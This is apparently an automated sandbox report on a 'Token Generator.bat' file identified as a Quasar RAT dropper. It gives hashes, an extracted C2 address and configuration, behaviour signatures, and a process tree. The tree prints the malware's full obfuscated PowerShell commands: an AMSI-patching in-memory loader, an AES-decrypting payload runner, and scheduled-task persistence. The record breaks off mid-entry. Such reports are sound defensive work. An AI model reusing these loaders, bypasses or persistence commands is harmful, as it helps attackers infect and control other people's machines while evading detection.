Analysis

  • max time kernel
    150s
  • max time network
    149s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240508-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20240508-enlocale:en-usos:windows10-2004-x64system
  • submitted
    27-05-2024 22:07

General

  • Target

    Token Generator.bat

  • Size

    3.5MB

  • MD5

    e984ebea899379a8c0a47f9308c7370b

  • SHA1

    863330006bef4c55a1bc79771ae989dc0412f717

  • SHA256

    9f413ae8218ec74eb61a052e1c2b8b27f8ee7038902db5aaea9c93e0752fa48b

  • SHA512

    70934def86e93b350e72711e757cbe0a97a9a58259f184e2c97aeea3a2b9f016bb03e4fb499f3876248bfb43edec5e3949599448d95235afcb1b46d71362b975

  • SSDEEP

    49152:HgquNH3RLlp72pnTcrwIBX1F2A5LzeuUxZ3u3AnCH4El0oKYlL:HY

Malware Config

Extracted

Family

quasar

Attributes
  • reconnect_delay

    3000

Extracted

Family

quasar

Version

1.4.1

Botnet

Token Gen

C2

uk2.localto.net:6103

Mutex

0c14e9f2-6918-4e50-8463-04ad871c1e3d

Attributes
  • encryption_key

    6BE0D74806BB58E6DB21FA6E3B6DB38B4A72BAFC

  • install_name

    $77-powershell.exe

  • log_directory

    $77-Logs

  • reconnect_delay

    3000

  • startup_key

    Discord

  • subdirectory

    $77-Rootkit

Signatures

  • Quasar RAT

    Quasar is an open source Remote Access Tool.

  • Quasar payload 4 IoCs
  • Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 3 IoCs

    Run Powershell and hide display window.

  • Checks BIOS information in registry 2 TTPs 2 IoCs

    BIOS information is often read in order to detect sandboxing environments.

  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Executes dropped EXE 4 IoCs
  • Drops file in System32 directory 15 IoCs
  • Suspicious use of SetThreadContext 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Checks processor information in registry 2 TTPs 6 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Creates scheduled task(s) 1 TTPs 3 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Enumerates system info in registry 2 TTPs 3 IoCs
  • Modifies data under HKEY_USERS 62 IoCs
  • Modifies registry class 41 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of SetWindowsHookEx 1 IoCs
  • Suspicious use of UnmapMainImage 1 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

Processes

  • C:\Windows\system32\winlogon.exe
    winlogon.exe
    1⤵
      PID:612
      • C:\Windows\system32\dwm.exe
        "dwm.exe"
        2⤵
          PID:316
        • C:\Windows\System32\dllhost.exe
          C:\Windows\System32\dllhost.exe /Processid:{3153caba-7807-471a-b1a0-8dac9d1e6a72}
          2⤵
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of WriteProcessMemory
          PID:4284
      • C:\Windows\system32\lsass.exe
        C:\Windows\system32\lsass.exe
        1⤵
          PID:676
        • C:\Windows\system32\svchost.exe
          C:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM
          1⤵
            PID:956
          • C:\Windows\system32\svchost.exe
            C:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc
            1⤵
              PID:736
            • C:\Windows\System32\svchost.exe
              C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s lmhosts
              1⤵
                PID:512
              • C:\Windows\system32\svchost.exe
                C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s TimeBrokerSvc
                1⤵
                  PID:1100
                • C:\Windows\System32\svchost.exe
                  C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService
                  1⤵
                    PID:1112
                  • C:\Windows\System32\svchost.exe
                    C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s EventLog
                    1⤵
                    • Drops file in System32 directory
                    PID:1136
                  • C:\Windows\system32\svchost.exe
                    C:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule
                    1⤵
                    • Drops file in System32 directory
                    PID:1164
                    • C:\Windows\system32\taskhostw.exe
                      taskhostw.exe {222A245B-E637-4AE9-A93F-A59CA119A75E}
                      2⤵
                        PID:3028
                      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
                        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "function Local:OghofYGRxtVW{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$kpaKhSGXsyfSiV,[Parameter(Position=1)][Type]$HeigWGzscU)$HcdIqMKhHJd=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName(''+'R'+'e'+[Char](102)+'l'+[Char](101)+''+[Char](99)+'te'+[Char](100)+''+[Char](68)+''+'e'+'l'+[Char](101)+''+[Char](103)+''+[Char](97)+'t'+[Char](101)+'')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule(''+[Char](73)+''+[Char](110)+''+'M'+''+[Char](101)+''+[Char](109)+''+[Char](111)+''+'r'+''+[Char](121)+''+[Char](77)+''+'o'+''+[Char](100)+''+[Char](117)+''+[Char](108)+'e',$False).DefineType(''+[Char](77)+''+[Char](121)+''+[Char](68)+''+[Char](101)+''+[Char](108)+''+[Char](101)+''+[Char](103)+''+[Char](97)+'t'+[Char](101)+''+'T'+''+[Char](121)+''+[Char](112)+''+'e'+'','Cl'+[Char](97)+''+[Char](115)+''+[Char](115)+''+','+'P'+[Char](117)+'b'+[Char](108)+''+[Char](105)+''+[Char](99)+','+[Char](83)+'ea'+[Char](108)+''+'e'+''+[Char](100)+''+','+'A'+'n'+''+'s'+''+'i'+''+'C'+'l'+[Char](97)+''+[Char](115)+'s'+[Char](44)+''+'A'+''+[Char](117)+''+[Char](116)+''+[Char](111)+'C'+[Char](108)+''+[Char](97)+''+[Char](115)+'s',[MulticastDelegate]);$HcdIqMKhHJd.DefineConstructor(''+'R'+''+[Char](84)+''+[Char](83)+''+[Char](112)+'e'+[Char](99)+''+'i'+'a'+[Char](108)+'Na'+[Char](109)+''+[Char](101)+','+[Char](72)+''+[Char](105)+''+'d'+''+'e'+''+[Char](66)+''+'y'+''+[Char](83)+''+'i'+'g,'+'P'+''+[Char](117)+''+'b'+''+[Char](108)+''+[Char](105)+''+[Char](99)+'',[Reflection.CallingConventions]::Standard,$kpaKhSGXsyfSiV).SetImplementationFlags(''+'R'+''+[Char](117)+'n'+[Char](116)+''+[Char](105)+''+[Char](109)+''+[Char](101)+','+[Char](77)+''+'a'+''+'n'+''+[Char](97)+''+'g'+''+[Char](101)+'d');$HcdIqMKhHJd.DefineMethod(''+[Char](73)+'n'+[Char](118)+''+[Char](111)+'k'+[Char](101)+'','P'+[Char](117)+''+[Char](98)+''+[Char](108)+''+'i'+''+[Char](99)+''+[Char](44)+''+[Char](72)+''+[Char](105)+'d'+[Char](101)+''+[Char](66)+''+[Char](121)+''+'S'+''+[Char](105)+''+[Char](103)+''+[Char](44)+''+[Char](78)+''+[Char](101)+''+[Char](119)+''+[Char](83)+'l'+[Char](111)+''+'t'+''+[Char](44)+''+[Char](86)+'i'+[Char](114)+''+'t'+''+'u'+''+'a'+'l',$HeigWGzscU,$kpaKhSGXsyfSiV).SetImplementationFlags('Ru'+'n'+''+'t'+'i'+'m'+''+[Char](101)+',M'+'a'+''+[Char](110)+''+[Char](97)+''+[Char](103)+''+[Char](101)+''+[Char](100)+'');Write-Output $HcdIqMKhHJd.CreateType();}$kaRuZLqjtSJiA=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals(''+[Char](83)+''+[Char](121)+'st'+[Char](101)+''+'m'+''+[Char](46)+''+[Char](100)+'l'+[Char](108)+'')}).GetType(''+[Char](77)+'i'+[Char](99)+''+'r'+''+[Char](111)+'s'+'o'+'f'+'t'+''+'.'+'W'+[Char](105)+''+[Char](110)+''+[Char](51)+''+[Char](50)+''+'.'+''+'U'+'ns'+'a'+''+[Char](102)+''+'e'+''+'N'+''+[Char](97)+''+[Char](116)+''+'i'+''+[Char](118)+''+[Char](101)+''+[Char](77)+'e'+'t'+'hod'+[Char](115)+'');$ebpvThXOPbbKPh=$kaRuZLqjtSJiA.GetMethod(''+[Char](71)+''+[Char](101)+''+[Char](116)+''+'P'+''+[Char](114)+''+'o'+'c'+'A'+''+[Char](100)+''+[Char](100)+''+[Char](114)+''+'e'+''+'s'+''+'s'+'',[Reflection.BindingFlags](''+'P'+''+[Char](117)+'b'+[Char](108)+''+[Char](105)+''+'c'+','+[Char](83)+''+[Char](116)+''+[Char](97)+'t'+[Char](105)+''+[Char](99)+''),$Null,[Reflection.CallingConventions]::Any,@((New-Object IntPtr).GetType(),[string]),$Null);$fLgcwAhkcSaIQfdIJLX=OghofYGRxtVW @([String])([IntPtr]);$wvtqVnCvSlHzueioNwNjfb=OghofYGRxtVW @([IntPtr],[UIntPtr],[UInt32],[UInt32].MakeByRefType())([Bool]);$aySqolOtyRb=$kaRuZLqjtSJiA.GetMethod(''+'G'+''+'e'+''+'t'+''+[Char](77)+''+[Char](111)+''+[Char](100)+'ule'+[Char](72)+'a'+[Char](110)+''+'d'+'l'+'e'+'').Invoke($Null,@([Object](''+'k'+''+[Char](101)+''+[Char](114)+'n'+[Char](101)+''+[Char](108)+''+[Char](51)+''+'2'+''+'.'+''+[Char](100)+''+[Char](108)+''+[Char](108)+'')));$mNuZJIcPChSDeH=$ebpvThXOPbbKPh.Invoke($Null,@([Object]$aySqolOtyRb,[Object](''+'L'+''+[Char](111)+'ad'+[Char](76)+''+'i'+''+[Char](98)+''+[Char](114)+''+'a'+''+'r'+'yA')));$HpZDfsYVvztCMvjGk=$ebpvThXOPbbKPh.Invoke($Null,@([Object]$aySqolOtyRb,[Object](''+'V'+''+[Char](105)+''+[Char](114)+'t'+'u'+'al'+[Char](80)+'rot'+[Char](101)+''+[Char](99)+'t')));$AchHIIO=[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($mNuZJIcPChSDeH,$fLgcwAhkcSaIQfdIJLX).Invoke(''+[Char](97)+'m'+[Char](115)+''+[Char](105)+'.'+[Char](100)+''+[Char](108)+''+[Char](108)+'');$etuKgWTEDfScfBqJU=$ebpvThXOPbbKPh.Invoke($Null,@([Object]$AchHIIO,[Object](''+[Char](65)+'m'+[Char](115)+''+[Char](105)+'S'+[Char](99)+''+[Char](97)+''+[Char](110)+''+'B'+''+[Char](117)+''+[Char](102)+'f'+[Char](101)+''+[Char](114)+'')));$YdiOwYnQAC=0;[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($HpZDfsYVvztCMvjGk,$wvtqVnCvSlHzueioNwNjfb).Invoke($etuKgWTEDfScfBqJU,[uint32]8,4,[ref]$YdiOwYnQAC);[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc3),0,$etuKgWTEDfScfBqJU,6);[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($HpZDfsYVvztCMvjGk,$wvtqVnCvSlHzueioNwNjfb).Invoke($etuKgWTEDfScfBqJU,[uint32]8,0x20,[ref]$YdiOwYnQAC);[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey(''+[Char](83)+''+'O'+'FT'+'W'+''+'A'+''+[Char](82)+''+[Char](69)+'').GetValue(''+[Char](36)+'7'+[Char](55)+''+[Char](115)+''+[Char](116)+''+'a'+''+'g'+'er')).EntryPoint.Invoke($Null,$Null)"
                        2⤵
                        • Suspicious use of NtCreateUserProcessOtherParentProcess
                        • Drops file in System32 directory
                        • Suspicious use of SetThreadContext
                        • Modifies data under HKEY_USERS
                        • Suspicious behavior: EnumeratesProcesses
                        • Suspicious use of WriteProcessMemory
                        PID:1656
                        • C:\Windows\System32\Conhost.exe
                          \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                          3⤵
                            PID:2968
                      • C:\Windows\system32\svchost.exe
                        C:\Windows\system32\svchost.exe -k LocalService -p -s DispBrokerDesktopSvc
                        1⤵
                          PID:1244
                        • C:\Windows\system32\svchost.exe
                          C:\Windows\system32\svchost.exe -k LocalService -p -s nsi
                          1⤵
                            PID:1308
                          • C:\Windows\system32\svchost.exe
                            C:\Windows\system32\svchost.exe -k netsvcs -p -s ProfSvc
                            1⤵
                              PID:1320
                            • C:\Windows\system32\svchost.exe
                              C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s Dhcp
                              1⤵
                                PID:1408
                              • C:\Windows\system32\svchost.exe
                                C:\Windows\system32\svchost.exe -k netsvcs -p -s UserManager
                                1⤵
                                  PID:1508
                                  • C:\Windows\system32\sihost.exe
                                    sihost.exe
                                    2⤵
                                      PID:2696
                                  • C:\Windows\system32\svchost.exe
                                    C:\Windows\system32\svchost.exe -k LocalService -p -s EventSystem
                                    1⤵
                                      PID:1548
                                    • C:\Windows\System32\svchost.exe
                                      C:\Windows\System32\svchost.exe -k netsvcs -p -s Themes
                                      1⤵
                                        PID:1564
                                      • C:\Windows\System32\svchost.exe
                                        C:\Windows\System32\svchost.exe -k NetworkService -p -s NlaSvc
                                        1⤵
                                          PID:1580
                                        • C:\Windows\system32\svchost.exe
                                          C:\Windows\system32\svchost.exe -k netsvcs -p -s SENS
                                          1⤵
                                            PID:1712
                                          • C:\Windows\System32\svchost.exe
                                            C:\Windows\System32\svchost.exe -k LocalService -p -s netprofm
                                            1⤵
                                              PID:1740
                                            • C:\Windows\System32\svchost.exe
                                              C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s AudioEndpointBuilder
                                              1⤵
                                                PID:1748
                                              • C:\Windows\System32\svchost.exe
                                                C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p
                                                1⤵
                                                  PID:1844
                                                • C:\Windows\system32\svchost.exe
                                                  C:\Windows\system32\svchost.exe -k appmodel -p -s StateRepository
                                                  1⤵
                                                    PID:1988
                                                  • C:\Windows\system32\svchost.exe
                                                    C:\Windows\system32\svchost.exe -k NetworkService -p -s Dnscache
                                                    1⤵
                                                      PID:2028
                                                    • C:\Windows\System32\svchost.exe
                                                      C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p
                                                      1⤵
                                                        PID:2040
                                                      • C:\Windows\system32\svchost.exe
                                                        C:\Windows\system32\svchost.exe -k netsvcs -p -s Winmgmt
                                                        1⤵
                                                          PID:1060
                                                        • C:\Windows\System32\svchost.exe
                                                          C:\Windows\System32\svchost.exe -k netsvcs -p -s ShellHWDetection
                                                          1⤵
                                                            PID:1956
                                                          • C:\Windows\System32\spoolsv.exe
                                                            C:\Windows\System32\spoolsv.exe
                                                            1⤵
                                                              PID:2164
                                                            • C:\Windows\System32\svchost.exe
                                                              C:\Windows\System32\svchost.exe -k NetworkService -p -s LanmanWorkstation
                                                              1⤵
                                                                PID:2308
                                                              • C:\Windows\System32\svchost.exe
                                                                C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -s RmSvc
                                                                1⤵
                                                                  PID:2392
                                                                • C:\Windows\system32\svchost.exe
                                                                  C:\Windows\system32\svchost.exe -k netsvcs -p -s IKEEXT
                                                                  1⤵
                                                                    PID:2604
                                                                  • C:\Windows\system32\svchost.exe
                                                                    C:\Windows\system32\svchost.exe -k NetworkServiceNetworkRestricted -p -s PolicyAgent
                                                                    1⤵
                                                                      PID:2616
                                                                    • C:\Windows\system32\svchost.exe
                                                                      C:\Windows\system32\svchost.exe -k UnistackSvcGroup -s CDPUserSvc
                                                                      1⤵
                                                                        PID:2716
                                                                      • C:\Windows\system32\svchost.exe
                                                                        C:\Windows\system32\svchost.exe -k NetworkService -p -s CryptSvc
                                                                        1⤵
                                                                        • Drops file in System32 directory
                                                                        PID:2780
                                                                      • C:\Windows\system32\svchost.exe
                                                                        C:\Windows\system32\svchost.exe -k netsvcs -p -s LanmanServer
                                                                        1⤵
                                                                          PID:2840
                                                                        • C:\Windows\sysmon.exe
                                                                          C:\Windows\sysmon.exe
                                                                          1⤵
                                                                            PID:2868
                                                                          • C:\Windows\System32\svchost.exe
                                                                            C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s TrkWks
                                                                            1⤵
                                                                              PID:2892
                                                                            • C:\Windows\system32\svchost.exe
                                                                              C:\Windows\system32\svchost.exe -k netsvcs -p -s WpnService
                                                                              1⤵
                                                                                PID:2904
                                                                              • C:\Windows\system32\svchost.exe
                                                                                C:\Windows\system32\svchost.exe -k netsvcs -p -s TokenBroker
                                                                                1⤵
                                                                                  PID:3076
                                                                                • C:\Windows\system32\wbem\unsecapp.exe
                                                                                  C:\Windows\system32\wbem\unsecapp.exe -Embedding
                                                                                  1⤵
                                                                                    PID:3084
                                                                                  • C:\Windows\system32\svchost.exe
                                                                                    C:\Windows\system32\svchost.exe -k LocalService -p -s CDPSvc
                                                                                    1⤵
                                                                                      PID:3496
                                                                                    • C:\Windows\Explorer.EXE
                                                                                      C:\Windows\Explorer.EXE
                                                                                      1⤵
                                                                                      • Suspicious use of UnmapMainImage
                                                                                      PID:3508
                                                                                      • C:\Windows\system32\cmd.exe
                                                                                        C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\Token Generator.bat"
                                                                                        2⤵
                                                                                        • Suspicious use of WriteProcessMemory
                                                                                        PID:1436
                                                                                        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('l7xIjD7w3X9IZsoce95u+FWxpwh41oGtZjuJWP8Q3+U='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('7Ji4GPB6lVnv6Xlch9sujw=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $aXkIe=New-Object System.IO.MemoryStream(,$param_var); $bzUdJ=New-Object System.IO.MemoryStream; $mnRoM=New-Object System.IO.Compression.GZipStream($aXkIe, [IO.Compression.CompressionMode]::Decompress); $mnRoM.CopyTo($bzUdJ); $mnRoM.Dispose(); $aXkIe.Dispose(); $bzUdJ.Dispose(); $bzUdJ.ToArray();}function execute_function($param_var,$param2_var){ $ncCdx=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $NjXjX=$ncCdx.EntryPoint; $NjXjX.Invoke($null, $param2_var);}$host.UI.RawUI.WindowTitle = 'C:\Users\Admin\AppData\Local\Temp\Token Generator.bat';$jtmXF=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\AppData\Local\Temp\Token Generator.bat').Split([Environment]::NewLine);foreach ($yxuaZ in $jtmXF) { if ($yxuaZ.StartsWith(':: ')) { $FJFrF=$yxuaZ.Substring(3); break; }}$payloads_var=[string[]]$FJFrF.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));
                                                                                          3⤵
                                                                                          • Command and Scripting Interpreter: PowerShell
                                                                                          • Modifies registry class
                                                                                          • Suspicious behavior: EnumeratesProcesses
                                                                                          • Suspicious use of AdjustPrivilegeToken
                                                                                          • Suspicious use of WriteProcessMemory
                                                                                          PID:4588
                                                                                          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                            "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Register-ScheduledTask -TaskName 'RuntimeBroker_startup_474_str' -Trigger (New-ScheduledTaskTrigger -AtLogon) -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\startup_str_474.vbs') -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -Hidden -ExecutionTimeLimit 0) -RunLevel Highest -Force
                                                                                            4⤵
                                                                                            • Command and Scripting Interpreter: PowerShell
                                                                                            • Suspicious behavior: EnumeratesProcesses
                                                                                            • Suspicious use of AdjustPrivilegeToken
                                                                                            PID:4908
                                                                                          • C:\Windows\System32\WScript.exe
                                                                                            "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\startup_str_474.vbs"
                                                                                            4⤵
                                                                                            • Checks computer location settings
                                                                                            • Suspicious use of WriteProcessMemory
                                                                                            PID:2976
                                                                                            • C:\Windows\system32\cmd.exe
                                                                                              C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\startup_str_474.bat" "
                                                                                              5⤵
                                                                                              • Suspicious use of WriteProcessMemory
                                                                                              PID:3576
                                                                                              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('l7xIjD7w3X9IZsoce95u+FWxpwh41oGtZjuJWP8Q3+U='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('7Ji4GPB6lVnv6Xlch9sujw=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $aXkIe=New-Object System.IO.MemoryStream(,$param_var); $bzUdJ=New-Object System.IO.MemoryStream; $mnRoM=New-Object System.IO.Compression.GZipStream($aXkIe, [IO.Compression.CompressionMode]::Decompress); $mnRoM.CopyTo($bzUdJ); $mnRoM.Dispose(); $aXkIe.Dispose(); $bzUdJ.Dispose(); $bzUdJ.ToArray();}function execute_function($param_var,$param2_var){ $ncCdx=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $NjXjX=$ncCdx.EntryPoint; $NjXjX.Invoke($null, $param2_var);}$host.UI.RawUI.WindowTitle = 'C:\Users\Admin\AppData\Roaming\startup_str_474.bat';$jtmXF=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\AppData\Roaming\startup_str_474.bat').Split([Environment]::NewLine);foreach ($yxuaZ in $jtmXF) { if ($yxuaZ.StartsWith(':: ')) { $FJFrF=$yxuaZ.Substring(3); break; }}$payloads_var=[string[]]$FJFrF.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));
                                                                                                6⤵
                                                                                                • Command and Scripting Interpreter: PowerShell
                                                                                                • Suspicious behavior: EnumeratesProcesses
                                                                                                • Suspicious use of WriteProcessMemory
                                                                                                PID:3792
                                                                                                • C:\Users\Admin\AppData\Local\Temp\Token Generator.exe
                                                                                                  "C:\Users\Admin\AppData\Local\Temp\Token Generator.exe"
                                                                                                  7⤵
                                                                                                  • Executes dropped EXE
                                                                                                  • Suspicious use of WriteProcessMemory
                                                                                                  PID:4700
                                                                                                  • C:\Windows\SYSTEM32\schtasks.exe
                                                                                                    "schtasks" /create /tn "Discord" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\$77-Rootkit\$77-powershell.exe" /rl HIGHEST /f
                                                                                                    8⤵
                                                                                                    • Creates scheduled task(s)
                                                                                                    PID:1404
                                                                                                  • C:\Users\Admin\AppData\Roaming\$77-Rootkit\$77-powershell.exe
                                                                                                    "C:\Users\Admin\AppData\Roaming\$77-Rootkit\$77-powershell.exe"
                                                                                                    8⤵
                                                                                                    • Executes dropped EXE
                                                                                                    • Suspicious use of SetWindowsHookEx
                                                                                                    • Suspicious use of WriteProcessMemory
                                                                                                    PID:3036
                                                                                                    • C:\Windows\SYSTEM32\schtasks.exe
                                                                                                      "schtasks" /create /tn "Discord" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\$77-Rootkit\$77-powershell.exe" /rl HIGHEST /f
                                                                                                      9⤵
                                                                                                      • Creates scheduled task(s)
                                                                                                      PID:4372
                                                                                                • C:\Users\Admin\AppData\Local\Temp\Install.exe
                                                                                                  "C:\Users\Admin\AppData\Local\Temp\Install.exe"
                                                                                                  7⤵
                                                                                                  • Executes dropped EXE
                                                                                                  PID:1092
                                                                                                • C:\Windows\SYSTEM32\schtasks.exe
                                                                                                  "schtasks" /create /tn "Discord" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\$77-Rootkit\$77-powershell.exe" /rl HIGHEST /f
                                                                                                  7⤵
                                                                                                  • Creates scheduled task(s)
                                                                                                  PID:4484
                                                                                                • C:\Users\Admin\AppData\Roaming\$77-Rootkit\$77-powershell.exe
                                                                                                  "C:\Users\Admin\AppData\Roaming\$77-Rootkit\$77-powershell.exe"
                                                                                                  7⤵
                                                                                                  • Executes dropped EXE
                                                                                                  PID:2120
                                                                                    • C:\Windows\system32\svchost.exe
                                                                                      C:\Windows\system32\svchost.exe -k ClipboardSvcGroup -p -s cbdhsvc
                                                                                      1⤵
                                                                                        PID:3668
                                                                                      • C:\Windows\system32\DllHost.exe
                                                                                        C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
                                                                                        1⤵
                                                                                          PID:3864
                                                                                        • C:\Windows\System32\RuntimeBroker.exe
                                                                                          C:\Windows\System32\RuntimeBroker.exe -Embedding
                                                                                          1⤵
                                                                                          • Modifies registry class
                                                                                          PID:4020
                                                                                        • C:\Windows\System32\RuntimeBroker.exe
                                                                                          C:\Windows\System32\RuntimeBroker.exe -Embedding
                                                                                          1⤵
                                                                                            PID:3920
                                                                                          • C:\Windows\system32\svchost.exe
                                                                                            C:\Windows\system32\svchost.exe -k netsvcs -p -s wlidsvc
                                                                                            1⤵
                                                                                              PID:388
                                                                                            • C:\Windows\System32\svchost.exe
                                                                                              C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s StorSvc
                                                                                              1⤵
                                                                                                PID:4960
                                                                                              • C:\Windows\system32\svchost.exe
                                                                                                C:\Windows\system32\svchost.exe -k LocalServiceAndNoImpersonation -p -s SSDPSRV
                                                                                                1⤵
                                                                                                  PID:2368
                                                                                                • C:\Windows\system32\svchost.exe
                                                                                                  C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s WinHttpAutoProxySvc
                                                                                                  1⤵
                                                                                                  • Modifies data under HKEY_USERS
                                                                                                  PID:1192
                                                                                                • C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe
                                                                                                  "C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe" /service
                                                                                                  1⤵
                                                                                                  • Drops file in System32 directory
                                                                                                  • Modifies data under HKEY_USERS
                                                                                                  PID:1680
                                                                                                • C:\Windows\system32\SppExtComObj.exe
                                                                                                  C:\Windows\system32\SppExtComObj.exe -Embedding
                                                                                                  1⤵
                                                                                                    PID:544
                                                                                                  • C:\Windows\System32\svchost.exe
                                                                                                    C:\Windows\System32\svchost.exe -k LocalService -p -s LicenseManager
                                                                                                    1⤵
                                                                                                      PID:4016
                                                                                                    • C:\Windows\system32\DllHost.exe
                                                                                                      C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
                                                                                                      1⤵
                                                                                                        PID:516
                                                                                                      • C:\Windows\System32\RuntimeBroker.exe
                                                                                                        C:\Windows\System32\RuntimeBroker.exe -Embedding
                                                                                                        1⤵
                                                                                                          PID:4836
                                                                                                        • C:\Windows\System32\RuntimeBroker.exe
                                                                                                          C:\Windows\System32\RuntimeBroker.exe -Embedding
                                                                                                          1⤵
                                                                                                            PID:1400
                                                                                                          • C:\Windows\System32\RuntimeBroker.exe
                                                                                                            C:\Windows\System32\RuntimeBroker.exe -Embedding
                                                                                                            1⤵
                                                                                                            • Modifies registry class
                                                                                                            PID:3952
                                                                                                          • C:\Windows\System32\WaaSMedicAgent.exe
                                                                                                            C:\Windows\System32\WaaSMedicAgent.exe 7f8b43ef666b38b492ba267684a46b39 JpXush++2kyUb8rEoB26ew.0.1.0.0.0
                                                                                                            1⤵
                                                                                                              PID:1692
                                                                                                              • C:\Windows\System32\Conhost.exe
                                                                                                                \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                2⤵
                                                                                                                  PID:4604
                                                                                                              • C:\Windows\system32\wbem\wmiprvse.exe
                                                                                                                C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                                                                                                                1⤵
                                                                                                                • Checks BIOS information in registry
                                                                                                                • Enumerates system info in registry
                                                                                                                PID:4336
                                                                                                              • C:\Windows\system32\svchost.exe
